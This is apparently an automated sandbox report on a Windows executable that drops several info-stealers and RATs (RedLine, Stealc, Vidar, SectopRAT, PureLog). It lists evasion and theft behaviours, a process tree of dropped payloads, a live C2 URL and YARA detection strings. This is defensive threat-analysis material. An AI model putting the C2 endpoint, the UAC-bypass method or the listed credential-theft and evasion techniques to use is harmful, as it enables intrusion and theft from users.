Edit tour

Windows Analysis Report
VucRf0jboS.exe

Overview

General Information

Sample name:	VucRf0jboS.exe renamed because original name is a hash value
Original sample name:	5cd97a765e0c9463f57769117db519fa.exe
Analysis ID:	1432419
MD5:	5cd97a765e0c9463f57769117db519fa
SHA1:	10cbbb15ce42e4328441109668ebda4d4b7c15eb
SHA256:	3b37fec0af4f32196086cfaad850c32113b60766190d283e2bc2f92a19b8cf20
Tags:	32exe
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VucRf0jboS.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\VucRf0jboS.exe" MD5: 5CD97A765E0C9463F57769117DB519FA)

u5qk.0.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.0.exe" MD5: 17342752EC286810D28AA4F324C3E8E5)

cmd.exe (PID: 7972 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

FBAKEHIEBK.exe (PID: 6232 cmdline: "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe" MD5: 6C93FC68E2F01C20FB81AF24470B790C)

WerFault.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 7924 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

u5qk.3.exe (PID: 3704 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.3.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)

SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)

WerFault.exe (PID: 7360 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168 MD5: C31336C1EFC2CCB44B4326EA793040F2)

run.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)

cmd.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 5440 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\nkho	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\nkho	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\nkho	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\ssfwvk	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\ssfwvk	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\ssfwvk	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
C:\Users\user\AppData\Local\Temp\u5qk.3.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1650:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xba8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: u5qk.0.exe PID: 7516	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: u5qk.0.exe PID: 7516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: u5qk.0.exe PID: 7516	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: run.exe PID: 7780	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7924	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 7924	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7924	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7596	JoeSecurity_SectopRAT	Yara detected SectopRAT	Joe Security
Process Memory Space: run.exe PID: 7612	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 3052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 3052	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 3052	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.u5qk.0.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5qk.0.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
1.2.u5qk.0.exe.5c70e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5qk.0.exe.5c70e67.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
18.2.MSBuild.exe.900000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.run.exe.39d686d.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.MSBuild.exe.900000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.run.exe.3e7ad5b.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.54c00c8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cmd.exe.54c00c8.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.2.run.exe.39d686d.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
14.2.run.exe.3a1ad5b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.MSBuild.exe.900000.0.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
6.2.cmd.exe.54c00c8.8.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
3.2.run.exe.3e7ad5b.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
14.2.run.exe.3a1ad5b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
1.2.u5qk.0.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5qk.0.exe.400000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e901eeb15.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.cmd.exe.52100c8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.cmd.exe.52100c8.7.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.cmd.exe.52100c8.7.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.2.u5qk.0.exe.5c70e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5qk.0.exe.5c70e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
15.2.cmd.exe.4c3b976.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.cmd.exe.4c3b976.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20eeb370000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.cmd.exe.4a80e64.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.cmd.exe.4a80e64.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d0fe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d189:$s1: CoGetObject 0x1d0e2:$s2: Elevation:Administrator!new:
3.2.run.exe.3e7a15b.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.run.exe.3e7a15b.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
6.2.cmd.exe.54c00c8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cmd.exe.54c00c8.8.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.cmd.exe.54c00c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.3.u5qk.0.exe.5ca0000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5qk.0.exe.5ca0000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
